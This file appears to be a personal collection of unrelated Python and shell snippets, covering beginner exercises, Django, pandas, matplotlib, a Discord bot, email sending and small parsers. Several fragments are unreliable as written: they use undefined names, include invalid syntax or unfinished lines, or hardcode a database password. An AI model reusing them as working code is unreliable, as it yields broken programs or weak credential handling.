    return cross_entropy_loss(predictions, targets)
import requests
html = requests.get('https://google.com')

from bs4 import BeautifulSoup
soup = BeautifulSoup(product_page.content, 'html.parser')

class_book = soup.find('div', {'class': 'book'})
import tempfile

from django.core.files import File
from django.db import models


class Word(models.Model):
    """A vocabulary word with an auto-generated text-to-speech MP3."""

    word = models.CharField(max_length=200)
    audio = models.FileField(upload_to='audio/', blank=True)

    def save(self, *args, **kwargs):
        """Synthesize the word's audio with gTTS, attach it, then save.

        NOTE(review): relies on ``gTTS`` being imported at module level.
        """
        # Bug fix: the original referenced self.word_vocab, but the model
        # field is named ``word``.
        audio = gTTS(text=self.word, lang='en', slow=True)

        # Bug fix: gTTS emits MP3 *bytes*, so the temp file must be binary
        # ('w+b'), not text mode ('w'); rewind before Django reads it.
        with tempfile.TemporaryFile(mode='w+b') as f:
            audio.write_to_fp(f)
            f.seek(0)
            file_name = '{}.mp3'.format(self.word)
            # Bug fix: save=False, otherwise FieldFile.save() re-invokes
            # this model save() and recurses; super().save() below persists.
            self.audio.save(file_name, File(file=f), save=False)

        super(Word, self).save(*args, **kwargs)

#The call audio.save(self.word + ".mp3") won't work for this use case; you must use #write_to_fp or open the file created by that method, as pointed out in the documentation. I hope this helps.
django-admin startproject mysite
 
python manage.py startapp myapp
import pandas as pd
import matplotlib.pyplot as plt

from pandas_profiling import ProfileReport
profile = ProfileReport(gabijos, title='Gabijos g.', html={'style':{'full_width':True}})
profile.to_file("gabijos.html")

mkdir /home/pi/.config/autostart
sudo nano /home/pi/.config/autostart/meteo.desktop


[Desktop Entry]
Type=Application
Name=Meteo
Exec=/usr/bin/python3 /home/pi/mqtt_display_temp_time_01_480.py

(firstEnv)
>>conda install -c anaconda ipykernel
>>python -m ipykernel install --user --name=firstEnv
# Iterate through each line of our list
for each_line in a_list_of_lines:
    script_line_number = script_line_number + 1
    # If an asterisk is found in the line (meaning that a character's lines are starting)
    if each_line.find("*") != -1:
        # Add the character's name to the 'character_appearance_lines' list
        character_appearance_lines.append(each_line)
        # Add the script line number to the appearance list
        character_appearance_lines.append(script_line_number)
import sweetviz as sv

my_report = sv.analyze(my_dataframe)
my_report.show_html() # Default arguments will generate to "SWEETVIZ_REPORT.html"
df_train.loc[df_train.Age.isnull(), 'Age'] = df_train.groupby(['Sex','Pclass','Title']).Age.transform('median')
import matplotlib.pyplot as plt
import numpy as np
from numpy import save

fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim([0, 10])
ax.set_ylim([0, 10])

points_storage=[]

def onclick(event):
    """Matplotlib button-press callback: plot the clicked point and record it.

    Appends [xdata, ydata] to the module-level ``points_storage`` list and
    redraws the figure so the new marker appears immediately.
    """
    print('button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %
          (event.button, event.x, event.y, event.xdata, event.ydata))
    plt.plot(event.xdata, event.ydata, 'o',markersize=5)

    fig.canvas.draw()
    points_storage.append([event.xdata, event.ydata])

cid = fig.canvas.mpl_connect('button_press_event', onclick)
plt.show()

acumulado =np.asarray(points_storage)

np.save('puntos.npy', acumulado)

print(acumulado)
from matplotlib import pyplot as plt

class LineBuilder:
    """Interactively extend a matplotlib line with the points the user clicks.

    Registers itself as the figure's button_press_event handler; each click
    inside the line's axes appends a point to the line's data.
    """

    def __init__(self, line):
        self.line = line
        self.xs = list(line.get_xdata())
        self.ys = list(line.get_ydata())
        self.cid = line.figure.canvas.mpl_connect('button_press_event', self)

    def __call__(self, event):
        print('click', event)
        # Ignore clicks that land outside this line's axes.
        if event.inaxes != self.line.axes:
            return
        self.xs.append(event.xdata)
        self.ys.append(event.ydata)
        self.line.set_data(self.xs, self.ys)
        self.line.figure.canvas.draw()

fig, ax = plt.subplots()
ax.set_title('click to build line segments')
line, = ax.plot([0], [0])  # empty line
linebuilder = LineBuilder(line)

plt.show()
django-admin startproject mysite

python manage.py startapp myapp
from os import walk

_, _, filenames = next(walk(mypath))
#!/usr/bin/env python
import subprocess
from multiprocessing import Pool
import os

src = "/home/student-03-474f458f89e0/data/prod"
dest = "/home/student-03-474f458f89e0/data/prod_backup"

def run_sync(file):
    """rsync one entry from the module-level *src* tree into *dest*.

    -a archive, -r recursive, -q quiet; one call per top-level entry so
    the copies can run in parallel under multiprocessing.Pool.
    """
    print(os.path.join(dest,file))
    subprocess.call(["rsync", "-arq", os.path.join(src,file), os.path.join(dest,file)])

if __name__ == "__main__":
    files = os.listdir(src)
    p = Pool(len(files))
    p.map(run_sync, files)
#!/usr/bin/env python3

from multiprocessing import Pool

def run(task):
    """Placeholder worker: report which task this process is handling."""
    print("Handling {}".format(task))

if __name__ == "__main__":
  tasks = ['task1', 'task2', 'task3']
  # Create a pool of specific number of CPUs
  p = Pool(len(tasks))
  # Start each task within the pool
  p.map(run, tasks)
if reg_form.is_valid():
            nuevo_usuario = reg_form.save(commit=False)
            pw_hash = bcrypt.hashpw(clave.encode(), bcrypt.gensalt()).decode() 
            nuevo_usuario.password = pw_hash
            nuevo_usuario.save()
from discord.ext import commands
from os import getenv
from dotenv import load_dotenv

client = commands.Bot(command_prefix="!")
load_dotenv()

client.run(str(getenv('BOT_TOKEN')))
# this line will write the code below into a Python script called script.py
%%writefile script.py
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
# Django database settings for the local dojoreads Postgres instance.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'dojoreads_db',
        'USER': 'postgres',
        'PASSWORD': 'root',  # NOTE(review): hardcoded credential — move to an env var.
        'HOST': '127.0.0.1',
        'PORT': '5432',
    }
}
from requests import PreparedRequest

# ...

@client.event
async def on_member_join(member):
    """Post a welcome-card embed to the configured channel when a member joins."""
    if config['join_leave_message'] is True:
        channel = client.get_channel(config['join_leave_channel'])
        embed = discord.Embed(colour=discord.Colour.green())
        # PreparedRequest is used only to URL-encode the card parameters.
        req = PreparedRequest()
        req.prepare_url(
            url='https://api.xzusfin.repl.co/card?',
            params={
                'avatar': str(member.avatar_url_as(format='png')),
                'middle': 'welcome',
                'name': str(member.name),
                'bottom': str('on ' + member.guild.name),
                'text': '#CCCCCC',
                'avatarborder': '#CCCCCC',
                'avatarbackground': '#CCCCCC',
                'background': '#000000' #or image url
            }
        )
        embed.set_image(url=req.url)
        await channel.send(embed=embed)
# Render a simple text progress bar.
size = 30
value = 44
max_value = 100
border_l = '|'
border_r = '|'
fill = '#'
empty = '_'

# Number of filled cells, rounded to the nearest cell.
filled_cells = round(size * (value / max_value))
bar = border_l + fill * filled_cells + empty * (size - filled_cells) + border_r

print(bar)
# -------------------------------------------------------------------------------------------
# email retrieving script
# -------------------------------------------------------------------------------------------
#!/usr/bin/env python3

import csv
import sys


def populate_dictionary(filename):
  """Populate a dictionary with name/email pairs for easy lookup."""
  email_dict = {}
  with open(filename) as csvfile:
    for row in csv.reader(csvfile, delimiter=','):
      # Names are stored lowercased so lookups are case-insensitive.
      full_name = row[0].lower()
      email_dict[full_name] = row[1]
  return email_dict

def find_email(argv):
  """Return an email address based on the username given.

  *argv* mirrors sys.argv: argv[1] and argv[2] are the first and last
  name.  Returns "Missing parameters" when either is absent and
  "No email address found" when the name is not in the CSV.
  """
  try:
    fullname = str(argv[1] + " " + argv[2])
    # Preprocess the data.
    email_dict = populate_dictionary('/home/{{ username }}/data/user_emails.csv')
    # Look the address up once instead of calling get() twice.
    email = email_dict.get(fullname.lower())
    return email if email else "No email address found"
  except IndexError:
    return "Missing parameters"

def main():
  """Print the email lookup result for the command-line arguments."""
  print(find_email(sys.argv))

if __name__ == "__main__":
  main()


# -------------------------------------------------------------------------------------------
# Unit test script
# -------------------------------------------------------------------------------------------

#!/usr/bin/env python3

import unittest
from emails import find_email


class EmailsTest(unittest.TestCase):
  """Unit tests for emails.find_email (expects the user_emails.csv fixture)."""

  def test_basic(self):
    """A known first+last name resolves to its address."""
    testcase = [None, "Bree", "Campbell"]
    expected = "breee@abc.edu"
    self.assertEqual(find_email(testcase), expected)

  def test_one_name(self):
    """Only one name supplied -> the missing-parameters message."""
    testcase = [None, "John"]
    expected = "Missing parameters"
    self.assertEqual(find_email(testcase), expected)

  def test_two_name(self):
    """A name absent from the CSV -> the not-found message."""
    testcase = [None, "Roy","Cooper"]
    expected = "No email address found"
    self.assertEqual(find_email(testcase), expected)

if __name__ == '__main__':
  unittest.main()

my_new_list = [6, 3, 8, "12", 42]

def OrganizeList(myList):
    """Sort *myList* in place and return it.

    Raises AssertionError when any element is not a string.  The exception
    type is kept for backward compatibility, but it is raised explicitly so
    the validation survives ``python -O`` (a bare ``assert`` is stripped).
    """
    for item in myList:
        if not isinstance(item, str):
            raise AssertionError("Word list must be a list of strings")
    myList.sort()
    return myList

print(OrganizeList(my_new_list))
my_list = [27, 5, 9, 6, 8]

def RemoveValue(myVal):
    """Remove *myVal* from the module-level ``my_list`` and return the list.

    Raises ValueError when the value is not present.
    """
    # Guard clause instead of if/else nesting.
    if myVal not in my_list:
        raise ValueError("Value must be in the given list")
    my_list.remove(myVal)
    return my_list

print(RemoveValue(27))
print(RemoveValue(27))
def character_frequency(filename):
  """Count how often each character appears in the file *filename*.

  Returns a dict mapping character -> count, or None when the file
  cannot be opened.
  """
  try:
    f = open(filename)
  except OSError:
    return None

  # Bug fixes: the original mixed tabs and spaces (an IndentationError)
  # and returned ``characters()`` — *calling* the dict — instead of the
  # dict itself.
  characters = {}
  with f:
    for line in f:
      for char in line:
        # get() seeds a zero count the first time a character is seen.
        characters[char] = characters.get(char, 0) + 1
  return characters
        
import re

def rearrange_name(name):
    """Convert a name in "Last, First" form into "First Last".

    Returns *name* unchanged when it does not match the "Last, First"
    pattern (the original crashed with a TypeError on non-matches).
    """
    result = re.search(r"^([\w .]*), ([\w .]*)$", name)
    if result is None:
        return name
    return "{} {}".format(result[2], result[1])
                       
#!/usr/bin/env python3
import sys
import os
import re

def error_search(log_file):
  """Interactively build an error pattern and return matching log lines.

  Prompts the user for an error description, then returns every line of
  *log_file* containing the word "error" plus every word of the
  description (case-insensitive).
  """
  error = input("What is the error")
  returned_errors = []

  # Hoisted out of the per-line loop: the original rebuilt this pattern
  # list for every line of the log file.
  error_patterns = ["error"]
  for word in error.split(" "):
    error_patterns.append(word.lower())

  with open(log_file, mode="r", encoding="UTF-8") as file:
    # No explicit close: the original called file.close() inside the with
    # block, which the context manager already handles.
    for log in file.readlines():
      if all(re.search(error_pattern, log.lower()) for error_pattern in error_patterns):
        returned_errors.append(log)
  return returned_errors

def file_output(returned_errors):
  """Write every collected error line to ~/data/errors_found.log."""
  output_path = os.path.join(os.path.expanduser("~"), "data", "errors_found.log")
  with open(output_path, "w") as file:
    # The redundant file.close() inside the with block was removed; the
    # context manager closes the file.  writelines batches the writes.
    file.writelines(returned_errors)

if __name__ == "__main__":
  log_file = sys.argv[1] # take the first parameter passed as the path of the log file
  returned_errors = error_search(log_file)
  file_output(returned_errors)
  sys.exit(0) # exits python and gives exit status of 0 here
scaled_features = data.copy()

col_names = ['Age', 'Weight']
features = scaled_features[col_names]
scaler = StandardScaler().fit(features.values)
features = scaler.transform(features.values)

scaled_features[col_names] = features
print(scaled_features)
mkdir -p ~/.config
docker run -it --name code-server -p 127.0.0.1:5050:8080 \
  -v "$HOME/.config:/home/coder/.config" \
  -v "$PWD:/home/coder/project" \
  -u "$(id -u):$(id -g)" \
  -e "DOCKER_USER=$USER" \
  codercom/code-server:latest
df_query = df_query.assign(comments='NoComment')
# Table-driven cases for decode(): name -> (input line, expected dict).
params = {
    'empty_line': ('', {}),
    'get_ok': ('GET 200', {'request': 'GET', 'status': '200'}),
    'get_not_found': ('GET 404', {'request': 'GET', 'status': '404'}),
}

@pytest.mark.parametrize('line,expected', list(params.values()), ids=list(params.keys()))
def test_decode(self, line, expected):
    """Each log line decodes to its expected request/status dict.

    NOTE(review): the ``self`` parameter implies this lives inside a test
    class — confirm, otherwise pytest cannot fill it.
    """
    assert decode(line) == expected
#/////////////////////////////////////////////////////////////////////////////////////////////////////////
"""This is a custom python component, and this is the description. Code something!
    Inputs:
        x: This is the description of the x input.
        y: This is the description of the y input.
    Outputs:
        a: This is the description of the a output.
"""
#---------------------------------------------------------------------------------------------------------
#_________________________________________________________________________________________________________
__author__ = "Mode Lab / Jonathan Cortes-Rodriguez"
__version__ = "0.0.2020.00.00"
__date__ = "2020.MM.DD"
#---------------------------------------------------------------------------------------------------------
#_________________________________________________________________________________________________________
"""
ghenv.Component.Name = "Component Name"
ghenv.Component.NickName = "Component Nickname"
ghenv.Component.Description = "What does this component do?"
ghenv.Component.Message = "A Tag that sits below the component"
ghenv.Component.Category = "What's my main?"
ghenv.Component.SubCategory= "What's my sub?"
"""
#---------------------------------------------------------------------------------------------------------
#_________________________________________________________________________________________________________
import re

# Character classes: [...] matches any single character from the set.
for pattern, text in (
    (r"[Pp]ython", "Python"),
    (r"[a-z]way", "The end of the highway"),
    (r"cloud[a-zA-Z0-9]", "cloudy"),
):
    print(re.search(pattern, text))

# put ^ before a character class to search for anything but the given character class
print(re.search(r"[^a-zA-Z]", "This is a sentence with spaces."))

# | as OR operator
print(re.search(r"cat|dog", "I like dogs."))
print(re.findall(r"cat|dog", "I like both cats and dogs."))
# read
import csv  # local import so the snippet is self-contained

with open('software.csv') as software:
    reader = csv.DictReader(software)  # was: csv.Dicteader (typo -> AttributeError)
    for row in reader:
        print("{} has {} users".format(row["name"], row["users"]))

# write
users = [{"name": "Sol Mansi", "username": "solm", "department": "ITT infrastructure"}]
keys = ["name", "username", "department"]
# newline='' is required by the csv docs to avoid blank lines on Windows.
with open("by_department.csv", "w", newline="") as by_department:
    writer = csv.DictWriter(by_department, fieldnames=keys)  # fieldnames fixes the column order
    writer.writeheader()  # first line built from the field names
    writer.writerows(users)  # was: wirter (typo -> NameError)
import os

def parent_directory():
    """Return the absolute path of the parent of the current working directory."""
    # os.pardir is the portable spelling of '..'; abspath normalises it away.
    return os.path.abspath(os.path.join(os.getcwd(), os.pardir))

print(parent_directory())
# Stub: ignores `body` and just prints a greeting — presumably a placeholder
# for a real HTTP request implementation (TODO confirm intended behavior).
def send_http_request(body):
	print('hello')
import pandas as pd

# Scrape the third HTML table from the Indonesian-Wikipedia demographics page.
link = "https://id.wikipedia.org/wiki/Demografi_Indonesia"
df = pd.read_html(link, header=0)[2]

# Strip footnote markers from column names, then keep/reorder the columns of interest.
df = df.rename(columns={'Populasi[4]':'Populasi', 'Luas (km²)[5]':'Luas'})
df = df[['Kode BPS', 'Nama', 'Ibu kota', 'Populasi', 'Luas', 'Pulau']]

df.to_csv("Indonesia.csv", sep=',')
import pandas as pd

def wiki_to_csv(wikiurl: str):
    """Fetch every HTML table at *wikiurl* and write each non-empty one to CSV.

    Output files are named "<last URL path segment> table <i>".
    """
    # was: the body read an unrelated global `link` instead of the parameter,
    # and the signature used `wikiurl = str` (defaulting to the str *type*)
    # where a type annotation was clearly intended.
    tname = wikiurl.split("/")[-1]
    tables = pd.read_html(wikiurl, header=0)

    for i, table in enumerate(tables):
        if not table.empty:
            table.to_csv(tname + " table " + str(i), sep=',')
import shutil
import psutil

# Percentage of free space on the root filesystem (expression value is discarded
# unless run in a REPL).
du = shutil.disk_usage("/")
du.free/du.total*100

# CPU utilisation sampled over a 0.1 s blocking interval.
psutil.cpu_percent(.1)
import random

name = "Diego"
question = "Do I like this cookie?"

# Classic Magic 8-Ball responses keyed by the rolled number (1-9).
_responses = {
    1: "Yes - definetely.",
    2: "It is decidedly so.",
    3: "Without a doubt.",
    4: "Reply hazy, try again.",
    5: "Ask again later.",
    6: "Better not tell you now.",
    7: "My sources say no.",
    8: "Outlook not so good.",
    9: "Very doubtful.",
}

random_number = random.randint(1, 9)
print(random_number)

# randint(1, 9) always hits the table; "Error" mirrors the original else branch.
answer = _responses.get(random_number, "Error")

print(name +"asks:" +question)
print("Magic 8-Ball's answer:"+ answer)
print("I have information for the following planets:\n")

print("   1. Venus   2. Mars    3. Jupiter")
print("   4. Saturn  5. Uranus  6. Neptune\n")

weight = 185
planet = 3

# Surface-gravity factor and name per menu number; anything unlisted falls
# through to Neptune, exactly like the original if/elif chain's else branch.
_planets = {
    1: (0.91, "Venus"),
    2: (0.38, "Mars"),
    3: (2.34, "Jupiter"),
    4: (1.06, "Saturn"),
    5: (0.92, "Uranus"),
}
_factor, _name = _planets.get(planet, (1.19, "Neptune"))
weight = weight * _factor
print(_name)
print("Your weight:", weight)
grade = 86
print("letter grade")

# Walk the grade bands from highest to lowest; the first band that fits wins,
# and the for/else prints "F" when no band matched.
for cutoff, letter in ((90, "A"), (80, "B"), (70, "C"), (60, "D")):
  if grade >= cutoff:
    print(letter)
    break
else:
  print("F")
credits = 120
gpa = 1.9

# Both requirements must hold to graduate.
meets_both = credits >= 120 and gpa >= 2.0
if meets_both:
  print("You meet the requirements to graduate!")
else:
  print("You have met at least one of the requirements.")
credits = 120
gpa = 1.8

# Report each unmet requirement separately (x < 120 is equivalent to
# `not x >= 120` for these numeric values).
if credits < 120:
  print("You do not have enough credits to graduate.")
if gpa < 2.0:
  print("Your GPA is not high enough to graduate.")

# Both missing at once gets its own message.
if credits < 120 and gpa < 2.0:
  print("You do not meet either requirement to graduate!")
import pandas as pd

# Read every sheet of the workbook (sheet_name=None -> {sheet name: DataFrame}).
# was: sheetname= (keyword removed from pandas), DataFrame.append (removed in
# pandas 2.0), and a Python-2 `print full_table` statement (SyntaxError).
sheets_dict = pd.read_excel('Book1.xlsx', sheet_name=None)

frames = []
for name, sheet in sheets_dict.items():
    sheet['sheet'] = name  # remember which sheet each row came from
    # Multi-line column headers: keep only the last line of each name.
    sheet = sheet.rename(columns=lambda x: x.split('\n')[-1])
    frames.append(sheet)

# ignore_index=True replaces the original reset_index(drop=True).
full_table = pd.concat(frames, ignore_index=True) if frames else pd.DataFrame()

print(full_table)
qq= dff[~df.astype(str).apply(tuple, 1).isin(dff.astype(str).apply(tuple, 1))]
def f(in_str):
    """Upper-case *in_str* and return a (success_flag, result) pair."""
    return (True, in_str.upper())

succeeded, b = f("a")  # the returned tuple unpacks straight into two names
#nor_xr is  dataarray (var) name
# Convert the CFTimeIndex on the 'time' coordinate to a regular pandas
# DatetimeIndex and write it back, so pandas/matplotlib can handle the axis.
datetimeindex = nor_xr.indexes['time'].to_datetimeindex()

nor_xr['time'] = datetimeindex
# rios is dataarray (var) name
# NOTE(review): rename() returns a new object — this result is discarded;
# assign it (rio = rio.rename(...)) for the rename to take effect.
rio.rename({'x': 'longitude','y': 'latitude'})
#Write an expression for a string literal consisting of the following ASCII characters:

#Horizontal Tab character
#Newline (ASCII Linefeed) character
#The character with hexadecimal value 7E

"\t\n\x7E"

#https://www.loginradius.com/blog/async/eol-end-of-line-or-newline-characters/#:~:text=LF%20(character%20%3A%20%5Cn%2C,'%20or%20'Newline%20Character'.
#https://stackoverflow.com/questions/4488570/how-do-i-write-a-tab-in-python
# Which of the following are valid ways to specify the string literal foo'bar in Python:
"foo'bar"



# How would you express the constant floating-point value 3.2 × 10-12 in Python:
3.2e-12

#Examples

# NOTE(review): the block below uses C-style '//' annotations and is NOT valid
# Python as written (and 2.E100L is not a Python literal) — illustrative only.
0.       // = 0.0
-1.23    // = -1.23
23.45e6  // = 23.45 * 10^6
2e-5     // = 2.0 * 10^-5
3E+10    // = 3.0 * 10^10
.09E34   // = 0.09 * 10^34
2.E100L  // = 2.0 * 10^100

#How would you express the hexadecimal value a5 as a base-16 integer constant in Python?
0xa5
#Explanation base-16 is x
# integer is 0 and a5 is our value 
#Notice that binary and hexadecimal use prefixes to identify the number system. All integer #prefixes are in the form 0?, in which you replace ? with a character that refers to the number #system:

# b: binary (base 2)
# o: octal (base 8)
# d: decimal (base 10)
# x: hexadecimal (base 16)
import pandas as pd
# One-hot encode a Series of labels: one indicator column per distinct value.
s = pd.Series(list('abca'))
pd.get_dummies(s)
# NOTE(review): the lines below are a pasted REPL transcript (expected output),
# not executable Python.
Out[]: 
     a    b    c
0  1.0  0.0  0.0
1  0.0  1.0  0.0
2  0.0  0.0  1.0
3  1.0  0.0  0.0
credits = 118
gpa = 2.0

# `or`: one satisfied requirement is enough to trigger the message.
at_least_one = credits >= 120 or gpa >= 2.0
if at_least_one:
  print("You have met at least one of the requirements.")
# Initialise pyenv and pyenv-virtualenv in the current shell session.
export PATH="$HOME/.pyenv/bin:$PATH"
export PATH="/usr/local/bin:$PATH"

eval "$(pyenv init -)"
eval "$(pyenv virtualenv-init -)"
# Build flags so Python compiles against Homebrew's zlib/bzip2 (macOS).
export LDFLAGS="-L/usr/local/opt/zlib/lib -L/usr/local/opt/bzip2/lib"
export CPPFLAGS="-I/usr/local/opt/zlib/include -I/usr/local/opt/bzip2/include"
x = 20
y = 20

# Print only when the two values compare equal.
matches = x == y
if matches:
   print("These numbers are the same")
# Inspect the runtime type of a variable (your_data_variable must exist).
print(type(your_data_variable))
# NOTE(review): the bare URL below is not valid Python — it should be a comment.
https://www.codecademy.com/courses/learn-python-3/articles/python3-user-input
#1
lovely_loveseat_description="""Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. Red or white."""
lovely_loveseat_price=254.00
#2
stylish_settee_description="""Stylish Settee. Faux leather on birch. 29.50 inches high x 54.75 inches wide x 28 inches deep. Black."""
stylish_settee_price=180.50
#3
luxurious_lamp_description="""Luxurious Lamp. Glass and iron. 36 inches tall. Brown with cream shade."""
luxurious_lamp_price=52.15
#4
sales_tax=0.088
customer_one_total=0
customer_one_itemization = ""
#5
# Append the loveseat to the itemised receipt.
# was: `itemization += itemization + description`, which doubles the existing
# receipt text on every append; harmless here only because it starts empty.
customer_one_itemization += lovely_loveseat_description

# Tax is computed on the running total *before* the items are added (still 0),
# so the printed total matches the recorded output of 306.15.
customer_one_tax=customer_one_total*sales_tax
customer_one_total=customer_one_total+lovely_loveseat_price+luxurious_lamp_price+customer_one_tax


print("Customer One Items:")
print(customer_one_itemization)
print("Customer One Total:")
print(customer_one_total)

#output Customer One Items:
#Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. #Red or white.
#Customer One Total:
#306.15
# Print "FM" as ASCII block letters, one row per line.
print("FFFFF  M     M")
print("F      MM   MM")
print("FFF    M  M  M")
print("F      M     M")
print("F      M     M")
print("F      M     M")

#https://content.codecademy.com/courses/learn-cpp/hello-world/block-letters-hint.png
total_cost = 5
total_cost = total_cost + 10  # the += shorthand, written out long-hand
print(total_cost)

#output 15
# Assign the string here
# Triple-quoted literal: embedded newlines and indentation are kept verbatim.
to_you = """Stranger, if you passing meet me and desire to speak to me, why
  should you not speak to me?
And why should I not speak to you?"""


print(to_you)
string1 = "The wind, "
string2 = "which had hitherto carried us along with amazing rapidity, "
string3 = "sank at sunset to a light breeze; "
string4 = "the soft air just ruffled the water and "
string5 = "caused a pleasant motion among the trees as we approached the shore, "
string6 = "from which it wafted the most delightful scent of flowers and hay."

# Define message below:
# join() concatenates the fragments in order (equivalent to chained +).
message = "".join([string1, string2, string3, string4, string5, string6])

print(message)
# You're trying to divide a group into four teams; counting off, you got 27.
# Your team is 27 modulo 4.

# Example: 29 % 5 is the remainder of 29 / 5 (5 * 5 = 25, remainder 4).
print(29 % 5)

my_team = 27 % 4
print(my_team)
# output is 3

# Team assignment for every person 1..28 in the group.
for person in range(1, 29):
  print("Person ", str(person), "= Team ", str(person % 4))
sorted_dict = {k: unsort_dict[k] for k in sorted(unsort_dict.keys())}
# REPL transcript: merge two dicts, summing the values of keys present in both
# (missing keys default to 0 via dict.get).
>>> A = {'a':1, 'b':2, 'c':3}
>>> B = {'b':3, 'c':4, 'd':5}
>>> c = {x: A.get(x, 0) + B.get(x, 0) for x in set(A).union(B)}
>>> print(c)

{'a': 1, 'c': 7, 'b': 5, 'd': 5}
# Send a templated notification mail over SMTP with STARTTLS.
server = None  # defined up front so the finally block is safe if SMTP() itself fails
try:
    server = smtplib.SMTP(settings.email.smtp_server, settings.email.port)
    server.ehlo() # Can be omitted
    server.starttls(context=context) # Secure the connection
    server.ehlo() # Can be omitted
    server.login(settings.email.sender_email, settings.email_password)
    server.sendmail(settings.email.sender_email, receiver, message.format(number=transactions_processed, code=user_identifier))
    logger.info("Email sent to {name}", name=user)
except Exception as e:
    logger.error(e)
finally:
    # was: server.quit() unconditionally — raised NameError/UnboundLocalError
    # whenever the connection attempt itself threw before `server` was bound.
    if server is not None:
        server.quit()
# Deployment workflow for a Heroku app backed by Postgres.
git push heroku master # deploy to heroku

heroku addons:create heroku-postgresql:hobby-dev # create postgres db in heroku app
heroku run python # run python repl with heroku
# (typed inside that REPL) create tables from the SQLAlchemy models:
from app import db
db.create_all()

heroku pg:psql # db shell

heroku run python manage.py db upgrade --app name_of_your_application # upgrade db to heroku
heroku local # run locally on heroku and debug
df['col'] = pd.to_datetime(df['col'])
m = float(input("number 1"))
n = float(input("number 2"))

# range() only accepts integers — was: range(m, n+1) with floats (TypeError).
# The bounds are truncated to ints before looping.
i = 0
for i in range(int(m), int(n) + 1):
	i += 1  # kept from the original; has no lasting effect (loop rebinds i)

for i in range(int(n), int(m) + 1):
	i += 1
value = int(input("write a number: "))

# Build the sequence 1..value and print it as one space-separated string.
# was: `for i in value` — an int is not iterable (TypeError); range() supplies
# the intended counting loop.
t = []
for i in range(value):
	t.append(i + 1)

string = " ".join([str(i) for i in t])
print(string)
# Importing the standard-library "random" module...
import random

# Re-seed the global generator (no argument = OS entropy / current time),
# then draw one uniform float in [0.0, 1.0).
random.seed()
x = random.random()
# Send an email with attachment through the local Outlook client (Windows/COM).
import win32com.client as win32

outlook = win32.Dispatch('outlook.application')
mail = outlook.CreateItem(0)  # 0 = olMailItem
mail.To = 'email.here@email.com'
#mail.CC = "more email addresses here"
#mail.BCC = "more email addresses here"
mail.Subject = 'Write subject here'
mail.Body = 'Hi Receipient,\n\nPlease find the file attached.\n\nRegards,\nSender'
# was: a stray trailing '.' after the string literal (SyntaxError).
# NOTE(review): FileLocation must be defined by the surrounding script.
attachment = FileLocation + '/filename.xlsx'
mail.Attachments.Add(attachment)
mail.Send()
import datetime as dt
import os

#Folder Creation
Directory = 'C:/Users/Username/Desktop'
now = dt.datetime.now()
# NOTE(review): relativedelta (dateutil), pd (pandas) and the two Sheet*_df
# frames are used but not defined here — they must come from the surrounding
# script.
CompletedFor = now + relativedelta(months=+1)
CompletedForNumber = CompletedFor.month
CompletedForWord = CompletedFor.strftime('%B')
FollowingMonth = "{}. {}".format(CompletedForNumber, CompletedForWord)
# was: Directory + FollowingMonth — string concatenation without a path
# separator created e.g. 'Desktop2. February' *beside* Desktop, not inside it.
SaveLocation = os.path.join(Directory, FollowingMonth)
os.makedirs(SaveLocation)

### Creating Date for File Name: last day of the month after next.
Today = dt.datetime.now()
ContactDate = Today.replace(day=1) + relativedelta(months=+2) - relativedelta(days=1)
ContactDate = ContactDate.strftime('%d%B')

# Exporting to one excel file with two sheets with end of following month in name
os.chdir(SaveLocation)
writer = pd.ExcelWriter('ThisIsTheFIle' + ContactDate + '.xlsx',engine='xlsxwriter')
Sheet1_df.to_excel(writer, sheet_name='Sheet1', index=False)
Sheet2_df.to_excel(writer, sheet_name='Sheet2', index=False)
writer.save()
import re

def Phone_Number(s):
    s = str(s)
    s = s.translate(str.maketrans("", "", ",.-'\"():|*`;+/!&?$°@#"))
    s.replace('\.0', '')
    s = re.sub('\D', '', s)
    Prefixes = ["353", "00353", "0353", "00", "01" , "021", "022", "023", "024", "025", "026",
                "027", "028", "029", "0402", "0404", "041", "042", "043", "044", "045", "046",
                "047", "048", "049", "0504", "0505", "051", "052", "053", "056", "057", "058", 
                "059", "061", "062", "063", "064", "064", "065", "066", "067", "068", "069",
                "071", "074", "090", "091", "093", "094", "095", "096", "097", "098", "099" ]
    for n in Prefixes:
        if s.startswith(n):
            s = s.replace(n,"")
    if s.startswith('8') == True and len(s) == 9:
      s = '0' +s
    if len(s) < 6:
        s = ""
    if len(s) > 10:
        s = ""
    Contains = ['00000', '123456']
    if any(c in s for c in Contains):
        s = ""     
    return s
def County_Extract(address):
    """Return the Irish county named in *address*; "Unknown" if none appears.

    When several counties are mentioned, the one occurring last in the string
    wins (case-insensitive match).
    """
    counties_list = ['Carlow','Cavan','Clare', 'Cork',
                     'Donegal','Dublin','Galway','Kerry','Kildare','Kilkenny',
                     'Laois','Leitrim','Limerick','Longford','Louth','Mayo',
                     'Meath','Monaghan','Offaly','Roscommon','Sligo',
                     'Tipperary','Waterford','Westmeath',
                     'Wexford','Wicklow']

    county_match = ''
    # was: tab-indented line (IndentationError) and initialised to 0, which
    # silently missed a county sitting at position 0 of the address.
    old_find_index = -1

    upper_address = address.upper()
    for county in counties_list:
        find_index = upper_address.rfind(county.upper())
        if find_index > old_find_index:
            county_match = county
            old_find_index = find_index

    return county_match if old_find_index != -1 else "Unknown"
# Label each bar of a matplotlib bar chart with its (rounded) height,
# centred horizontally and sitting just above the bar top.
for p in ax.patches:
    values = '{:.0f}'.format(p.get_height())
    x = p.get_x() + p.get_width()/2
    y = p.get_height()
    ax.annotate(values, (x, y),ha='center', va ='bottom', fontsize = 10)
.apply(lambda x: x.replace(',',',').replace(',',',').split(',')
# python general ----------------------------------------------------------------------------------------

#variables changed in a function are partly unchanged; tried it with np array -> unchanged; list -> changed - outside of the function

# dataframes ------------------------------------------------------------------------------------------------

# pd.set_option('display.max_rows', 500)


# list_mcc = df_mcc_sum['mcc'][:20].values slicing dataframes
#syntax: df[slice/list or single column_name][slice of integer positions of rows]
# this works as well: df[slice of integer positions of rows] ... selects the rows for the whole df

# df.loc[slice/list or sthg of row labels, slice/list of column labels] ... these are really the labels, not the integer positions
